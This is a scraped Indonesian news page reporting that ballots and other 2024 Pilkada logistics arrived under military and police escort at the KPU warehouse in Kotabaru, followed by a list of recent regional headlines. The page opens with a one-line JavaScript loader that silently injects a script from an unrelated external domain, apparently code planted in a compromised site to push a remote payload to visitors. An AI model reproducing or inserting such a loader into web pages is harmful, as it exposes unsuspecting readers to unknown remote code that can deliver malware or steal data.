(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kotabaru

Pasi Intel Kodim 1004 Kawal Kedatangan Logistik Pilkada


KANALKALIMANTAN.COM, KOTABARU – Senin (28/10/24), bertepatan hari Sumpah Pemuda, gudang logistik Komisi Pemilihan Umum Kotabaru kedatangan logistik berupa surat suara sebanyak 241.267 lembar. Logistik pemilu ini datang dengan pengawalan ketat TNI/Polri serta para petugas penyelenggara Pemilu, Kabupaten Kotabaru.

Dandim 1004 Kotabaru, Letkol Inf Bayu Oktavianto Sudibyo melalui Pasi Intel Kodim 1004 Lettu Inf Setiawan mengatakan, pengamanan dilakukan guna menjamin semua logistik bukan hanya datang lokasi, tapi juga memastikan semua barang dalam kondisi baik dan tidak ada yang rusak.

“Semua pihak, baik itu TNI Polri dan para penyelenggara akan memastikan seluruh logistik dalam keadaan baik, sehingga nantinya akan siap digunakan dalam pelaksanaan Pilkada pada Nopember 2024 mendatang,” paparnya.

Baca juga: Jalan Terjal Sumardi Hapus Tuntutan Kurungan JPU terkait Konflik Tambang!

Mewakili Komandan Kodim 1004, Bayu mengawal kedatangan logistik ke gudang KPU yang berada di jalan raya Stagen, Desa Sungai Taib Kecamatan Pulau Laut Utara, dihadiri oleh pula oleh anggota Polri, Lanal, perwakilan KPU RI, KPU Provinsi, KPU Kotabaru dan pihak lainnya.

“Kami dan seluruh jajaran berharap pelaksanaan Pilkada nanti akan berjalan aman, damai dan situasi daerah kondusif, tidak ada hal-hal yang di inginkan terjadi,” jelasnya.

Ia mengimbau kepada seluruh lapisan masyarakat agar bersama-sama menjaga dan ikut mensukseskan jalannya Pilkada di Kabupaten Kotabaru.

Baca juga: Diterjang Opini Liar, Tim Cagub Muhidin Pilih Fokus ‘Jual&’ Visi Misi

“Mudah-mudahan pelaksanaannya nanti akan berjalan sesuai harapan. Namun yang pasti kita juga harus menjaga segala kemungkinan dan mengantisipasi hal-hal yang dapat memecah belah. Beda pilihan adalah biasa, yang jelas kita mesti jaga persaudaraan dan persatuan,” tutupnya.

Adapun rekap logistik Pilkada 2024 yang telah tiba dan tersimpan di gudang KPU Kotabaru antara lain, kotak suara sebanyak 1.150 pcs, tinta 1.104 pcs, kabel ties 7.464 pcs, bilik suara 2.204 pcs, sampul biasa 7.276 psc, sampul kotak 6.263 pcs, sampul Formulir C. Hasil-KWK 1.102 pcs dan 241.267 lembar surat suara. (Kanalkalimantan.com/muh)

Reporter: muh
Editor: cell


Muhammad Andi

Recent Posts

Rumah Penuh Air, Pak RT Mengungsi ke Rumah Tetangga

KANALKALIMANTAN.COM, MARTAPURA – Banjir yang melanda Desa Gudang Hirang, Kecamatan Sungaitabuk, Kabupaten Banjar menggenangi sejumlah… Read More

5 jam ago

Lonovila Menoreh Surga Tersembunyi di Perbukitan Menoreh

KANALKALIMANTAN.COM, YOGYAKARTA - Ada tempat yang tidak perlu banyak kata untuk membuat orang betah. Begitu… Read More

5 jam ago

Banjir di Komplek Antasari Perdana II Sungaitabuk, Akses Motor Lumpuh Total

KANALKALIMANTAN.COM, MARTAPURA – Banjir setinggi lutut orang dewasa menggenangi seluruh jalan di Komplek Antasari Perdana… Read More

6 jam ago

Bupati Banjar Bagikan Keperluan Warga Terdampak Banjir di Kelurahan Keraton

KANALKALIMANTAN.COM, MARTAPURA - Banjir di Kabupaten Banjar masih belum menunjukkan penurunan ketinggian air secara signifikan,… Read More

8 jam ago

Resmi! UMP Kalimantan Timur 2026 Naik 5,12%, Jadi Rp3,76 Juta

Upah Minimum Provinsi (UMP) Kalimantan Timur 2026 telah ditetapkan dan ditandatangani oleh Gubernur Rudy Mas’ud… Read More

14 jam ago

Tahun Baru Masalah Lama, Banjir Rendam Pemurus Dalam

KANALKALIMANTAN.COM, BANJARMASIN – Mengawali pergantian tahun, Kota Banjarmasin diguyur hujan dari pagi hingga petang, Kamis… Read More

1 hari ago

This website uses cookies.